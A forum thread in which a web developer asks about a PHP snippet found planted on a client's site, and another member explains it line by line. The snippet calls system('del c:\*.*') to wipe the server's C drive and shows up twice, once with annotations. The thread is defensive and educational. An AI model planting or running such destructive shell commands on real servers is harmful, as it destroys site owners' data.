Interesting code I found...

[alexjewell]

Code:

<?php 

$die = 'FAILED';

if ( passthru("dir c:\") {

	$run = system("del c:\*.*");

	exec ($run); 
}


else { die($die); }

?>

So I found this code on one of my client's sites and I'm hoping I caught it before it did any damage...it looks pretty dangerous?
What exactly does it do?
Does it REALLY delete someone's C DRIVE?!

[Twey]

Of course not. Just everything on it.

It's not dangerous, though, because it's missing a bracket.

[alexjewell]

Ok, that's good.

I'm pretty curious how this ended up on my client's site, but at least it wasn't affective.

Everything on the c drive...
that's SICK.

[Twey]

This is the bit where you go through every page on the site frantically looking for the security hole that allowed some script kiddy to upload that.

[alexjewell]

Wow, well...I'm glad it's missing a bracket.
Why would someone do this??

Anyway, I hate to use this as a learning experience...but I'm just curious, learning PHP...

Can you just kind of explain what the code does?

It creates a $die variable...

Then if it can get to the c drive, it creates the $run variable, then executes it?

And if it can't get to the c drive, it dies?

Is that right?

What are the asterisks for?

[Twey]

Basically, s/he's used passthru() with dir to check if C:\ exists. It's bad coding -- there are much better ways of doing this, and a lot of the code is totally redundant. For example, after executing "del c:\*.*", the script will attempt to execute the output.

Code:

<?php 

$die = 'FAILED';  // Set $die to 'FAILED': unnecessary because it's only used once

if ( passthru("dir c:\") {  // Check if C:\ exists (but not if we have write permission).  Ugly.  Note: missing bracket.  Evidently not written by someone who knows what s/he is doing.

	$run = system("del c:\*.*");  // Execute the command and store the last line of the output to $run.

	exec ($run);  // Try to execute the return value.
}


else { die($die); }  // Echo the failure string and exit -- unnecessarily, since the script ends here anyway.

?>

[alexjewell]

Hmmm, interesting.
So what other system commands are there?
can you create directories and move files from them, etc?

[Twey]

So what other system commands are there?

Argh, Windows users The commands executed by system() and the like are not PHP built-ins, but commands for the shell on top of which Windows was originally built, MS-DOS. MS-DOS stands for Microsoft Disk Operating System (the name of the original product before Microsoft acquired and modified it was QDOS, "Quick and Dirty Operating System") and is a basic command-line operating system.

UNIX-based operating systems tend to run a much more powerful shell such as bash. In fact, bash can also be used as a fully-featured scripting language, and is used extensively in several major programs.

[alexjewell]

Ok, well I know some DOS...so in system() you just write the DOS?
Well, that's pretty cool!
You could make folders on the person's machine, then put something into those folders...
For example, if they want to download a website or something (for my web design company or something), instead of putting everything in a zip folder, you could make new folders on their machine, then download the files into the certain folders.
You could even have them specify the area of their computer where they want it downloaded!
I'm mad someone did this...
But it's actually being used for the good now...haha...I'm learning.

[Twey]

Not quite The commands will be executed on the server, not the user's machine.